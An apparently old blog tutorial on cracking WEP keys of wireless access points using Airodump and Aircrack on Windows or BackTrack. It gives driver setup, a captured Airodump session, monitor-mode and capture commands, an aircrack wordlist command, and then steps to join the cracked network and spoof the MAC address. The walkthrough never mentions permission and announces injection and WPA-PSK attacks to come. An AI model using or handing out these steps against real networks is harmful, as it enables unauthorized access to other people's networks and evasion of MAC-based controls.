Before you can start cracking some Wireless AP, you need some preparation:
You need to switch your WLAN Card into monitor mode. The regular Windows drivers provided by the manufacturer will NOT support this feature. You need special drivers. Wildpackets.com provides those drivers for free, but only for a limited range of Cards. Check their website for supported Hardware. After you installed those drivers, you can use Airodump. There is one drawback for the Windows platform, no packet injection is supported. There are some commercial tools available, but (I think) the need a special driver too, so forget it. You need some additional Files to run Airodump, peek.dll and peek5.sys, available from wildpackets.com. Download the evaluation version of AiroPeek NX and install it, there you’ll find those 2 files. Be aware that the Windows version of Airodump is no 100% stable, from time to time, if you close Airodump, peek5.sys create a BSOD, the reason is still unknown. And don’t put your laptop into sleeping mode while Airodump is running, as you will get a BSOD as well! To run Aircrack you need this file: cygwin1.dll. The easiest way to get the peek files is, visit this link.
VMWare for Windows:
It *should* work but only with USB-Wireless NIC’s. This is due a VMWare limitation, which doesn’t allow direct HW access. Your PC-Card would be mapped as a regular NIC. I can’t test this, as I don’t own a USB Wireless NIC.
The easiest way is to use a live distribution like Auditor or BackTrack. Those distributions are bootable from CD and packed with all the tools and drivers you need. I’m using the Proxim Orinoco Card 8480-WD, to set this card into the monitor mode, you need the madwifi driver (Auditor 2.0 for example use the driver ath_pci and this driver does not support monitor mode). As you can see, it’s not that simple. Check this site for a complete listing of WLAN Adapter Chipset Directory (ok a bit outdated…). Get the BackTrack disto from here.
To crack a WEP Key, you need to collect a lot of IV’s. The Aircrack readme provided those next lines:
How do I crack a static WEP key?
The basic idea is to capture as much encrypted traffic as possible using Airodump. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run Aircrack on the resulting capture file.
How many IVs are required to crack WEP?
WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000 IVs; if you’re out of luck you may need two million IVs, or more.
Now we fire up Airodump to collect those IV’s:
Start “airdump.exe”, select the right driver.
Known network adapters:
14 Intel(R) PRO/Wireless 2200BG Network Connection
27 Atheros Wireless Network Adapter
Network interface index number -> 27
Interface types: 'o' = HermesI/Realtek
'a' = Aironet/Atheros
Network interface type (o/a) -> a
Channel(s): 1 to 14, 0 = all -> 0
(note: if you specify the same output prefix, airodump will resume
the capture session by appending data to the existing capture file)
Output filename prefix -> neophob
(note: to save space and only store the captured WEP IVs, press y.
The resulting capture file will only be useful for WEP cracking)
Only write WEP IVs (y/n) -> n
Set the Wireless NIC into monitor mode. I use ath0 as my Wireless card, replace this with your card.
# airmon.sh start ath0 0
Now start airodump. airodump <NIC> <FILENAME> <CHANNEL>. If you use 0 for the channel, all channels will be scanned. Here an example:
# airodump ath0 out 0
depending on your distribution you need another command to set the card into monitor mode:
#iwpriv ath0 monitor 2 1 (enables monitor mode)
#iwpriv ath0 monitor 0 1 (disables monitor mode)
Now wait until you collected about 900’000 IV’s. If there’s no traffic on the AP, no IV’s will be transmitted. You can generate traffic by using Aireplay. More about this later.
Start Aircrack to get the WEP Key:
> aircrack -a 1 out.ivs -w /path/to/wordlist
select the BSSID you want to crack and wait.
If you succeeded logon to the AP:
#iwconfig ath0 mode managed key 00:11:22:…. essid ESSID channel 11
#ipconfig ath0 up
get ip adress via dhcp
# dhcpcd ath0
Fake the mac address:
#ifconfig ath0 down
#ifconfig ath0 hw ether 00:11:22:33:44:55
#ifconfig ath0 up
In the next article we will inject some packets to speed up the whole process. And a WPA-PSK crack we’ll show you as well..